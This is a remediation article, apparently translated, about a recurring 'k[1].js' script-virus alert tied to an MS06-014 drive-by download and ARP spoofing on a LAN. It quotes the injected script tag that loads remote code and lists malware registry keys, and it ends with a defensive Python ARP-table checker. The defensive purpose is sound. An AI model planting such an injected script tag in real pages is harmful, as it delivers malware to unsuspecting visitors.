SoFunction
Updated on 2025-04-08

Solution to the k[1].js script virus

A script virus (file name k[1].js) always appears in Temporary Internet Files. Rising's monitoring kills it, it comes back, and this repeats over and over! I tried to clear the temporary files, but as soon as I open a web page (regardless of which one), k[1].js is caught by Rising's monitoring again. What's going on? Is it a false alarm?

This web page exploits the MS06-014 vulnerability to download http://day./ to C:\WINDOWS\ and register it directly in the registry:


Code:
HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}
pointing to C:\WINDOWS\


Because Rising detects and removes it, under normal circumstances you will not be infected. The reason the virus alert keeps recurring is:

A computer on the LAN is infected with this virus and then launches an ARP attack on the other computers on the LAN, inserting the following code into the network packets that other users receive:


Code:
<script src="http://k./" type="text/javascript"></script>


This injected code causes a virus alert for other users whenever they visit any website.

So first, confirm whether your own computer is infected.

Check whether the following registry paths exist:


Code:
[HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]


If they are present, try to delete both registry paths in safe mode.

If they do not exist, the problem is not that your computer is infected, but that you are the target of an ARP attack.

In this case, contact the LAN's network administrator for coordination. You must find the computer that is infected and performing the ARP spoofing, then disconnect it from the network and scan it for the virus.
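
To help with that last step, the following added example (not part of the original article) parses Windows `arp -a` output and lists every MAC address that answers for more than one IP address, which is the usual trace an ARP-spoofing host leaves in a victim's ARP table. The sample table, the gateway address and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample of Windows `arp -a` output (not taken from the article).
SAMPLE_ARP_OUTPUT = """
Interface: 192.168.1.23 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-16-3e-aa-bb-57     dynamic
  192.168.1.42          00-1c-42-10-20-30     dynamic
  192.168.1.57          00-16-3e-aa-bb-57     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# One table row: IPv4 address, dash-separated MAC, entry type.
ENTRY = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+((?:[0-9a-f]{2}-){5}[0-9a-f]{2})\s+(\w+)\s*$",
    re.IGNORECASE | re.MULTILINE,
)

def ip_key(ip):
    """Sort key that orders dotted-quad addresses numerically."""
    return tuple(int(part) for part in ip.split("."))

def parse_arp_table(text):
    """Return {mac: [ips]} for unicast entries of an `arp -a` listing."""
    by_mac = defaultdict(set)
    for ip, mac, _entry_type in ENTRY.findall(text):
        mac = mac.lower()
        # Broadcast/multicast MACs (group bit set) are shared by design: skip.
        if int(mac[:2], 16) & 0x01:
            continue
        by_mac[mac].add(ip)
    return {mac: sorted(ips, key=ip_key) for mac, ips in by_mac.items()}

def find_shared_macs(text, gateway_ip=None):
    """Return (mac, ips, involves_gateway) for each MAC claiming several IPs."""
    findings = []
    for mac, ips in parse_arp_table(text).items():
        if len(ips) > 1:
            findings.append((mac, ips, gateway_ip in ips))
    return findings

if __name__ == "__main__":
    # The gateway address is an assumption; use your own default gateway.
    for mac, ips, hits_gw in find_shared_macs(SAMPLE_ARP_OUTPUT, "192.168.1.1"):
        note = " (includes the gateway)" if hits_gw else ""
        print(f"{mac} answers for {', '.join(ips)}{note}")
```

A MAC shared between the gateway and another address points at the host to investigate, but a router or a machine with several addresses can produce the same pattern legitimately, so confirm against the gateway's real MAC before disconnecting anything.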